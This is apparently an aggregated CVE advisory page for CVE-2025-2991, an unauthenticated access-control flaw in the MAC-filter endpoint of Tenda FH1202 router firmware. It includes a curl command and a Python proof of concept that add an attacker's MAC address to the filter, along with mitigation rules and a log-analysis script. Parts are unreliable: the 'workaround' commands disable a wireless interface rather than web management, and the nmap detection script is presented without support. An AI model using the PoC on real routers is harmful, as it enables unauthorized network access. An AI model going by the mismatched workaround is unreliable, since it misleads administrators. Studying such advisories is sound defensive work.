How CVE-2025-2991 Works
The vulnerability in Tenda FH1202 firmware v1.2.0.14(408) stems from improper access controls in the `/goform/AdvSetWrlmacfilter` endpoint of the web management interface. Attackers can remotely exploit this flaw by sending crafted HTTP requests without authentication, bypassing MAC address filtering restrictions. The lack of proper session validation allows unauthorized manipulation of wireless client access rules, potentially enabling network infiltration or MITM attacks.
DailyCVE Form
Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation:
curl -X POST "http://<Tenda_IP>/goform/AdvSetWrlmacfilter" \
  -d "mac=ATTACKER_MAC&action=add"
Detection:
nmap -p 80 --script http-vuln-cve2025-2991 <target_IP>
Mitigation:
1. Apply vendor firmware patch immediately.
2. Block external access to `/goform/AdvSetWrlmacfilter` via ACL:
location /goform/AdvSetWrlmacfilter { deny all; }
3. Network segmentation:
iptables -A FORWARD -p tcp --dport 80 -d <Tenda_IP> -j DROP
PoC (Python):
import requests

exploit_url = "http://target_ip/goform/AdvSetWrlmacfilter"
payload = {"mac": "11:22:33:44:55:66", "action": "add"}
response = requests.post(exploit_url, data=payload)
print(response.text)
Log Analysis:
grep "AdvSetWrlmacfilter" /var/log/nginx/access.log | awk '{print $1}' | sort -u
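The grep above lists every source address that touched the endpoint. As an added example (not from the original page or from Tenda), the script below goes further: it groups the same hits by source, separates accepted (2xx) requests from denied ones, and flags sources outside the management subnet. It assumes nginx "combined" log format; `MGMT_NET` and the sample log lines are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

ENDPOINT = "/goform/AdvSetWrlmacfilter"            # endpoint named in the advisory
MGMT_NET = ipaddress.ip_network("192.168.0.0/24")  # assumption: trusted admin subnet

# nginx "combined" format: ip - user [time] "METHOD path proto" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
192.168.0.10 - - [07/Apr/2025:09:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.10 - - [07/Apr/2025:09:01:40 +0000] "POST /goform/AdvSetWrlmacfilter HTTP/1.1" 200 38 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Apr/2025:09:02:13 +0000] "POST /goform/AdvSetWrlmacfilter HTTP/1.1" 200 38 "-" "curl/8.5.0"
203.0.113.7 - - [07/Apr/2025:09:02:15 +0000] "POST /goform/AdvSetWrlmacfilter?x=1 HTTP/1.1" 200 38 "-" "curl/8.5.0"
198.51.100.23 - - [07/Apr/2025:09:05:00 +0000] "POST /goform/AdvSetWrlmacfilter HTTP/1.1" 403 0 "-" "python-requests/2.31"
garbage line that does not match the log format
"""

def summarize(lines, mgmt_net=MGMT_NET):
    """Group requests to ENDPOINT by client IP; flag sources outside mgmt_net."""
    hits = defaultdict(lambda: {"count": 0, "posts": 0, "ok": 0, "first": None, "last": None})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["path"].split("?", 1)[0] != ENDPOINT:
            continue  # malformed line or unrelated request
        h = hits[m["ip"]]
        h["count"] += 1
        h["posts"] += m["method"] == "POST"
        h["ok"] += m["status"].startswith("2")  # 2xx: the device accepted the request
        h["first"] = h["first"] or m["time"]
        h["last"] = m["time"]
    report = []
    for ip, h in hits.items():
        try:
            outside = ipaddress.ip_address(ip) not in mgmt_net
        except ValueError:
            outside = True  # unparsable client field: treat as untrusted
        report.append({"ip": ip, "outside_mgmt": outside, **h})
    # Untrusted sources first, then by number of accepted requests.
    return sorted(report, key=lambda r: (not r["outside_mgmt"], -r["ok"], r["ip"]))

if __name__ == "__main__":
    for row in summarize(SAMPLE_LOG.splitlines()):
        print(row)
```

A source with `outside_mgmt` true and a non-zero `ok` count means a filter-rule change was accepted from an untrusted address; a 403 on the same path shows the deny rule from the mitigation step is taking effect.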
Firmware Verification:
openssl dgst -sha256 FH1202_Firmware_v1.2.0.16.bin
Temporary Workaround:
Disable web management interface:
uci set wireless.@wifi-iface[0].disabled=1
uci commit
/etc/init.d/network restart
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2991